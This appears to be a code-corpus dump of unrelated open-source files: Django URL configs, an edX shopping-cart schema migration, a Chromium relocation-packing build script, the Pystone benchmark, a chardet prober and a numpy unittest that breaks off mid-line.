.Permission(auto_create=True) \
.Next(this.spit_on_decision)
spit_on_decision = DynamicSplit(lambda p: p.split_count) \
.Next(this.make_decision)
make_decision = flow.View(views.DecisionView,
task_description="Decision required") \
.Next(this.join_on_decision)
join_on_decision = flow.Join() \
.Next(this.end)
end = flow.End()
|
dianshen/github | refs/heads/master | day15/app01/urls.py | 1 | """day15 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url,include
from django.contrib import admin
from app01 import views
urlpatterns = [
url(r'^$',views.login),
url(r'^login/', views.login),
url(r'^resgiter/', views.resgiter),
url(r'^admin/', views.admin),
url(r'^book/', views.book),
url(r'^bookmodel/', views.bookmodel),
]
|
rue89-tech/edx-platform | refs/heads/master | lms/djangoapps/shoppingcart/migrations/0021_auto__add_field_orderitem_created__add_field_orderitem_modified.py | 120 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'OrderItem.created'
db.add_column('shoppingcart_orderitem', 'created',
self.gf('model_utils.fields.AutoCreatedField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'OrderItem.modified'
db.add_column('shoppingcart_orderitem', 'modified',
self.gf('model_utils.fields.AutoLastModifiedField')(default=datetime.datetime.now),
keep_default=False)
def backwards(self, orm):
# Deleting field 'OrderItem.created'
db.delete_column('shoppingcart_orderitem', 'created')
# Deleting field 'OrderItem.modified'
db.delete_column('shoppingcart_orderitem', 'modified')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'shoppingcart.certificateitem': {
'Meta': {'object_name': 'CertificateItem', '_ormbases': ['shoppingcart.OrderItem']},
'course_enrollment': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['student.CourseEnrollment']"}),
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '128', 'db_index': 'True'}),
'mode': ('django.db.models.fields.SlugField', [], {'max_length': '50'}),
'orderitem_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['shoppingcart.OrderItem']", 'unique': 'True', 'primary_key': 'True'})
},
'shoppingcart.coupon': {
'Meta': {'object_name': 'Coupon'},
'code': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '255'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2014, 11, 6, 0, 0)'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'percentage_discount': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'shoppingcart.couponredemption': {
'Meta': {'object_name': 'CouponRedemption'},
'coupon': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shoppingcart.Coupon']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'order': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shoppingcart.Order']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'shoppingcart.courseregcodeitem': {
'Meta': {'object_name': 'CourseRegCodeItem', '_ormbases': ['shoppingcart.OrderItem']},
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '128', 'db_index': 'True'}),
'mode': ('django.db.models.fields.SlugField', [], {'default': "'honor'", 'max_length': '50'}),
'orderitem_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['shoppingcart.OrderItem']", 'unique': 'True', 'primary_key': 'True'})
},
'shoppingcart.courseregcodeitemannotation': {
'Meta': {'object_name': 'CourseRegCodeItemAnnotation'},
'annotation': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'course_id': ('xmodule_django.models.CourseKeyField', [], {'unique': 'True', 'max_length': '128', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'shoppingcart.courseregistrationcode': {
'Meta': {'object_name': 'CourseRegistrationCode'},
'code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32', 'db_index': 'True'}),
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '255', 'db_index': 'True'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2014, 11, 6, 0, 0)'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'created_by_user'", 'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'invoice': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shoppingcart.Invoice']", 'null': 'True'}),
'order': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'purchase_order'", 'null': 'True', 'to': "orm['shoppingcart.Order']"})
},
'shoppingcart.donation': {
'Meta': {'object_name': 'Donation', '_ormbases': ['shoppingcart.OrderItem']},
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '255', 'db_index': 'True'}),
'donation_type': ('django.db.models.fields.CharField', [], {'default': "'general'", 'max_length': '32'}),
'orderitem_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['shoppingcart.OrderItem']", 'unique': 'True', 'primary_key': 'True'})
},
'shoppingcart.donationconfiguration': {
'Meta': {'object_name': 'DonationConfiguration'},
'change_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'changed_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'on_delete': 'models.PROTECT'}),
'enabled': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'shoppingcart.invoice': {
'Meta': {'object_name': 'Invoice'},
'address_line_1': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'address_line_2': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'address_line_3': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'city': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'company_contact_email': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'company_contact_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'company_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'country': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '255', 'db_index': 'True'}),
'customer_reference_number': ('django.db.models.fields.CharField', [], {'max_length': '63', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'internal_reference': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'is_valid': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'recipient_email': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'recipient_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'total_amount': ('django.db.models.fields.FloatField', [], {}),
'zip': ('django.db.models.fields.CharField', [], {'max_length': '15', 'null': 'True'})
},
'shoppingcart.order': {
'Meta': {'object_name': 'Order'},
'bill_to_cardtype': ('django.db.models.fields.CharField', [], {'max_length': '32', 'blank': 'True'}),
'bill_to_ccnum': ('django.db.models.fields.CharField', [], {'max_length': '8', 'blank': 'True'}),
'bill_to_city': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}),
'bill_to_country': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}),
'bill_to_first': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}),
'bill_to_last': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}),
'bill_to_postalcode': ('django.db.models.fields.CharField', [], {'max_length': '16', 'blank': 'True'}),
'bill_to_state': ('django.db.models.fields.CharField', [], {'max_length': '8', 'blank': 'True'}),
'bill_to_street1': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}),
'bill_to_street2': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}),
'company_contact_email': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'company_contact_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'company_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'currency': ('django.db.models.fields.CharField', [], {'default': "'usd'", 'max_length': '8'}),
'customer_reference_number': ('django.db.models.fields.CharField', [], {'max_length': '63', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'order_type': ('django.db.models.fields.CharField', [], {'default': "'personal'", 'max_length': '32'}),
'processor_reply_dump': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'purchase_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'recipient_email': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'recipient_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'refunded_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'cart'", 'max_length': '32'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'shoppingcart.orderitem': {
'Meta': {'object_name': 'OrderItem'},
'created': ('model_utils.fields.AutoCreatedField', [], {'default': 'datetime.datetime.now'}),
'currency': ('django.db.models.fields.CharField', [], {'default': "'usd'", 'max_length': '8'}),
'fulfilled_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'line_desc': ('django.db.models.fields.CharField', [], {'default': "'Misc. Item'", 'max_length': '1024'}),
'list_price': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '30', 'decimal_places': '2'}),
'modified': ('model_utils.fields.AutoLastModifiedField', [], {'default': 'datetime.datetime.now'}),
'order': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shoppingcart.Order']"}),
'qty': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'refund_requested_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'report_comments': ('django.db.models.fields.TextField', [], {'default': "''"}),
'service_fee': ('django.db.models.fields.DecimalField', [], {'default': '0.0', 'max_digits': '30', 'decimal_places': '2'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'cart'", 'max_length': '32', 'db_index': 'True'}),
'unit_cost': ('django.db.models.fields.DecimalField', [], {'default': '0.0', 'max_digits': '30', 'decimal_places': '2'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'shoppingcart.paidcourseregistration': {
'Meta': {'object_name': 'PaidCourseRegistration', '_ormbases': ['shoppingcart.OrderItem']},
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '128', 'db_index': 'True'}),
'mode': ('django.db.models.fields.SlugField', [], {'default': "'honor'", 'max_length': '50'}),
'orderitem_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['shoppingcart.OrderItem']", 'unique': 'True', 'primary_key': 'True'})
},
'shoppingcart.paidcourseregistrationannotation': {
'Meta': {'object_name': 'PaidCourseRegistrationAnnotation'},
'annotation': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'course_id': ('xmodule_django.models.CourseKeyField', [], {'unique': 'True', 'max_length': '128', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'shoppingcart.registrationcoderedemption': {
'Meta': {'object_name': 'RegistrationCodeRedemption'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'order': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shoppingcart.Order']", 'null': 'True'}),
'redeemed_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2014, 11, 6, 0, 0)', 'null': 'True'}),
'redeemed_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'registration_code': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shoppingcart.CourseRegistrationCode']"})
},
'student.courseenrollment': {
'Meta': {'ordering': "('user', 'course_id')", 'unique_together': "(('user', 'course_id'),)", 'object_name': 'CourseEnrollment'},
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '255', 'db_index': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'db_index': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'mode': ('django.db.models.fields.CharField', [], {'default': "'honor'", 'max_length': '100'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
}
}
complete_apps = ['shoppingcart']
|
htlcnn/pyrevitscripts | refs/heads/master | HTL.tab/Test.panel/Test.pushbutton/keyman/keyman/keyman/urls.py | 1 | """keyman URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url
from django.contrib import admin
urlpatterns = [
url(r'^admin/', admin.site.urls),
]
|
lihui7115/ChromiumGStreamerBackend | refs/heads/master | build/android/gyp/pack_relocations.py | 34 | #!/usr/bin/env python
#
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Pack relocations in a library (or copy unchanged).
If --enable-packing and --configuration-name=='Release', invoke the
relocation_packer tool to pack the .rel.dyn or .rela.dyn section in the given
library files. This step is inserted after the libraries are stripped.
If --enable-packing is zero, the script copies files verbatim, with no
attempt to pack relocations.
Any library listed in --exclude-packing-list is also copied verbatim,
irrespective of any --enable-packing setting. Typically this would be
'libchromium_android_linker.so'.
"""
import optparse
import os
import shlex
import shutil
import sys
import tempfile
from util import build_utils
def PackLibraryRelocations(android_pack_relocations, library_path, output_path):
shutil.copy(library_path, output_path)
pack_command = [android_pack_relocations, output_path]
build_utils.CheckOutput(pack_command)
def CopyLibraryUnchanged(library_path, output_path):
shutil.copy(library_path, output_path)
def main(args):
args = build_utils.ExpandFileArgs(args)
parser = optparse.OptionParser()
build_utils.AddDepfileOption(parser)
parser.add_option('--clear-dir', action='store_true',
help='If set, the destination directory will be deleted '
'before copying files to it. This is highly recommended to '
'ensure that no stale files are left in the directory.')
parser.add_option('--configuration-name',
default='Release',
help='Gyp configuration name (i.e. Debug, Release)')
parser.add_option('--enable-packing',
choices=['0', '1'],
help=('Pack relocations if 1 and configuration name is \'Release\','
' otherwise plain file copy'))
parser.add_option('--exclude-packing-list',
default='',
help='Names of any libraries explicitly not packed')
parser.add_option('--android-pack-relocations',
help='Path to the relocations packer binary')
parser.add_option('--stripped-libraries-dir',
help='Directory for stripped libraries')
parser.add_option('--packed-libraries-dir',
help='Directory for packed libraries')
parser.add_option('--libraries', action='append',
help='List of libraries')
parser.add_option('--stamp', help='Path to touch on success')
options, _ = parser.parse_args(args)
enable_packing = (options.enable_packing == '1' and
options.configuration_name == 'Release')
exclude_packing_set = set(shlex.split(options.exclude_packing_list))
libraries = []
for libs_arg in options.libraries:
libraries += build_utils.ParseGypList(libs_arg)
if options.clear_dir:
build_utils.DeleteDirectory(options.packed_libraries_dir)
build_utils.MakeDirectory(options.packed_libraries_dir)
for library in libraries:
library_path = os.path.join(options.stripped_libraries_dir, library)
output_path = os.path.join(
options.packed_libraries_dir, os.path.basename(library))
if enable_packing and library not in exclude_packing_set:
PackLibraryRelocations(options.android_pack_relocations,
library_path,
output_path)
else:
CopyLibraryUnchanged(library_path, output_path)
if options.depfile:
build_utils.WriteDepfile(
options.depfile,
libraries + build_utils.GetPythonDependencies())
if options.stamp:
build_utils.Touch(options.stamp)
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
|
noam09/deluge-telegramer | refs/heads/master | telegramer/include/future/backports/test/pystone.py | 80 | #!/usr/bin/env python3
"""
"PYSTONE" Benchmark Program
Version: Python/1.1 (corresponds to C/1.1 plus 2 Pystone fixes)
Author: Reinhold P. Weicker, CACM Vol 27, No 10, 10/84 pg. 1013.
Translated from ADA to C by Rick Richardson.
Every method to preserve ADA-likeness has been used,
at the expense of C-ness.
Translated from C to Python by Guido van Rossum.
Version History:
Version 1.1 corrects two bugs in version 1.0:
First, it leaked memory: in Proc1(), NextRecord ends
up having a pointer to itself. I have corrected this
by zapping NextRecord.PtrComp at the end of Proc1().
Second, Proc3() used the operator != to compare a
record to None. This is rather inefficient and not
true to the intention of the original benchmark (where
a pointer comparison to None is intended; the !=
operator attempts to find a method __cmp__ to do value
comparison of the record). Version 1.1 runs 5-10
percent faster than version 1.0, so benchmark figures
of different versions can't be compared directly.
"""
from __future__ import print_function
from time import clock
LOOPS = 50000
__version__ = "1.1"
[Ident1, Ident2, Ident3, Ident4, Ident5] = range(1, 6)
class Record(object):
def __init__(self, PtrComp = None, Discr = 0, EnumComp = 0,
IntComp = 0, StringComp = 0):
self.PtrComp = PtrComp
self.Discr = Discr
self.EnumComp = EnumComp
self.IntComp = IntComp
self.StringComp = StringComp
def copy(self):
return Record(self.PtrComp, self.Discr, self.EnumComp,
self.IntComp, self.StringComp)
TRUE = 1
FALSE = 0
def main(loops=LOOPS):
benchtime, stones = pystones(loops)
print("Pystone(%s) time for %d passes = %g" % \
(__version__, loops, benchtime))
print("This machine benchmarks at %g pystones/second" % stones)
def pystones(loops=LOOPS):
return Proc0(loops)
IntGlob = 0
BoolGlob = FALSE
Char1Glob = '\0'
Char2Glob = '\0'
Array1Glob = [0]*51
Array2Glob = [x[:] for x in [Array1Glob]*51]
PtrGlb = None
PtrGlbNext = None
def Proc0(loops=LOOPS):
global IntGlob
global BoolGlob
global Char1Glob
global Char2Glob
global Array1Glob
global Array2Glob
global PtrGlb
global PtrGlbNext
starttime = clock()
for i in range(loops):
pass
nulltime = clock() - starttime
PtrGlbNext = Record()
PtrGlb = Record()
PtrGlb.PtrComp = PtrGlbNext
PtrGlb.Discr = Ident1
PtrGlb.EnumComp = Ident3
PtrGlb.IntComp = 40
PtrGlb.StringComp = "DHRYSTONE PROGRAM, SOME STRING"
String1Loc = "DHRYSTONE PROGRAM, 1'ST STRING"
Array2Glob[8][7] = 10
starttime = clock()
for i in range(loops):
Proc5()
Proc4()
IntLoc1 = 2
IntLoc2 = 3
String2Loc = "DHRYSTONE PROGRAM, 2'ND STRING"
EnumLoc = Ident2
BoolGlob = not Func2(String1Loc, String2Loc)
while IntLoc1 < IntLoc2:
IntLoc3 = 5 * IntLoc1 - IntLoc2
IntLoc3 = Proc7(IntLoc1, IntLoc2)
IntLoc1 = IntLoc1 + 1
Proc8(Array1Glob, Array2Glob, IntLoc1, IntLoc3)
PtrGlb = Proc1(PtrGlb)
CharIndex = 'A'
while CharIndex <= Char2Glob:
if EnumLoc == Func1(CharIndex, 'C'):
EnumLoc = Proc6(Ident1)
CharIndex = chr(ord(CharIndex)+1)
IntLoc3 = IntLoc2 * IntLoc1
IntLoc2 = IntLoc3 / IntLoc1
IntLoc2 = 7 * (IntLoc3 - IntLoc2) - IntLoc1
IntLoc1 = Proc2(IntLoc1)
benchtime = clock() - starttime - nulltime
if benchtime == 0.0:
loopsPerBenchtime = 0.0
else:
loopsPerBenchtime = (loops / benchtime)
return benchtime, loopsPerBenchtime
def Proc1(PtrParIn):
PtrParIn.PtrComp = NextRecord = PtrGlb.copy()
PtrParIn.IntComp = 5
NextRecord.IntComp = PtrParIn.IntComp
NextRecord.PtrComp = PtrParIn.PtrComp
NextRecord.PtrComp = Proc3(NextRecord.PtrComp)
if NextRecord.Discr == Ident1:
NextRecord.IntComp = 6
NextRecord.EnumComp = Proc6(PtrParIn.EnumComp)
NextRecord.PtrComp = PtrGlb.PtrComp
NextRecord.IntComp = Proc7(NextRecord.IntComp, 10)
else:
PtrParIn = NextRecord.copy()
NextRecord.PtrComp = None
return PtrParIn
def Proc2(IntParIO):
IntLoc = IntParIO + 10
while 1:
if Char1Glob == 'A':
IntLoc = IntLoc - 1
IntParIO = IntLoc - IntGlob
EnumLoc = Ident1
if EnumLoc == Ident1:
break
return IntParIO
def Proc3(PtrParOut):
global IntGlob
if PtrGlb is not None:
PtrParOut = PtrGlb.PtrComp
else:
IntGlob = 100
PtrGlb.IntComp = Proc7(10, IntGlob)
return PtrParOut
def Proc4():
global Char2Glob
BoolLoc = Char1Glob == 'A'
BoolLoc = BoolLoc or BoolGlob
Char2Glob = 'B'
def Proc5():
global Char1Glob
global BoolGlob
Char1Glob = 'A'
BoolGlob = FALSE
def Proc6(EnumParIn):
EnumParOut = EnumParIn
if not Func3(EnumParIn):
EnumParOut = Ident4
if EnumParIn == Ident1:
EnumParOut = Ident1
elif EnumParIn == Ident2:
if IntGlob > 100:
EnumParOut = Ident1
else:
EnumParOut = Ident4
elif EnumParIn == Ident3:
EnumParOut = Ident2
elif EnumParIn == Ident4:
pass
elif EnumParIn == Ident5:
EnumParOut = Ident3
return EnumParOut
def Proc7(IntParI1, IntParI2):
IntLoc = IntParI1 + 2
IntParOut = IntParI2 + IntLoc
return IntParOut
def Proc8(Array1Par, Array2Par, IntParI1, IntParI2):
global IntGlob
IntLoc = IntParI1 + 5
Array1Par[IntLoc] = IntParI2
Array1Par[IntLoc+1] = Array1Par[IntLoc]
Array1Par[IntLoc+30] = IntLoc
for IntIndex in range(IntLoc, IntLoc+2):
Array2Par[IntLoc][IntIndex] = IntLoc
Array2Par[IntLoc][IntLoc-1] = Array2Par[IntLoc][IntLoc-1] + 1
Array2Par[IntLoc+20][IntLoc] = Array1Par[IntLoc]
IntGlob = 5
def Func1(CharPar1, CharPar2):
CharLoc1 = CharPar1
CharLoc2 = CharLoc1
if CharLoc2 != CharPar2:
return Ident1
else:
return Ident2
def Func2(StrParI1, StrParI2):
IntLoc = 1
while IntLoc <= 1:
if Func1(StrParI1[IntLoc], StrParI2[IntLoc+1]) == Ident1:
CharLoc = 'A'
IntLoc = IntLoc + 1
if CharLoc >= 'W' and CharLoc <= 'Z':
IntLoc = 7
if CharLoc == 'X':
return TRUE
else:
if StrParI1 > StrParI2:
IntLoc = IntLoc + 7
return TRUE
else:
return FALSE
def Func3(EnumParIn):
EnumLoc = EnumParIn
if EnumLoc == Ident3: return TRUE
return FALSE
if __name__ == '__main__':
import sys
def error(msg):
print(msg, end=' ', file=sys.stderr)
print("usage: %s [number_of_loops]" % sys.argv[0], file=sys.stderr)
sys.exit(100)
nargs = len(sys.argv) - 1
if nargs > 1:
error("%d arguments are too many;" % nargs)
elif nargs == 1:
try: loops = int(sys.argv[1])
except ValueError:
error("Invalid argument %r;" % sys.argv[1])
else:
loops = LOOPS
main(loops)
|
Endika/sale-workflow | refs/heads/8.0 | sale_pricelist_discount/__init__.py | 15 | ##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2015 credativ ltd (<http://www.credativ.co.uk>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from . import model
|
stevehof/CouchPotatoServer | refs/heads/master | libs/chardet/mbcsgroupprober.py | 236 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Universal charset detector code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 2001
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
# Shy Shalom - original C code
# Proofpoint, Inc.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from charsetgroupprober import CharSetGroupProber
from utf8prober import UTF8Prober
from sjisprober import SJISProber
from eucjpprober import EUCJPProber
from gb2312prober import GB2312Prober
from euckrprober import EUCKRProber
from big5prober import Big5Prober
from euctwprober import EUCTWProber
class MBCSGroupProber(CharSetGroupProber):
def __init__(self):
CharSetGroupProber.__init__(self)
        self._mProbers = [
UTF8Prober(),
SJISProber(),
EUCJPProber(),
GB2312Prober(),
EUCKRProber(),
Big5Prober(),
EUCTWProber()]
self.reset()
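# A minimal usage sketch, not part of the original module. It assumes the
# snake_case prober interface (feed / get_charset_name / get_confidence)
# that CharSetGroupProber inherits from CharSetProber in this chardet line.
if __name__ == '__main__':
    prober = MBCSGroupProber()
    # Feed raw bytes; '\xe4\xbd\xa0\xe5\xa5\xbd' is a short UTF-8 sample.
    prober.feed('\xe4\xbd\xa0\xe5\xa5\xbd, world')
    print prober.get_charset_name(), prober.get_confidence()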
|
julzhk/simple_api | refs/heads/master | test_api_using_numpy.py | 1 | import unittest
import numpy as np
import datetime
COLUMN_LABELS = ['Name', 'Value', 'TimeStamp']
def str2datetime(s):
    return datetime.datetime.strptime(s[:19], "%Y-%m-%d %H:%M:%S")
class TestAPIFunctions(unittest.TestCase):
def setUp(self):
        self.df = np.loadtxt('test_dataset.csv',
                             skiprows=1,
                             dtype={'names': COLUMN_LABELS,
                                    'formats': ['S8', 'i8', 'S19']},
                             delimiter=',')
def test_simple_numpy(self):
self.assertEqual( self.df[0][0],'name1')
self.assertEqual( self.df[0][1],1)
self.assertEqual( self.df[1][0],'name2')
self.assertEqual( self.df[1][1],2)
def test_dates(self):
testdate = str2datetime(self.df[0][2])
        self.assertEqual(testdate,
                         datetime.datetime.strptime(
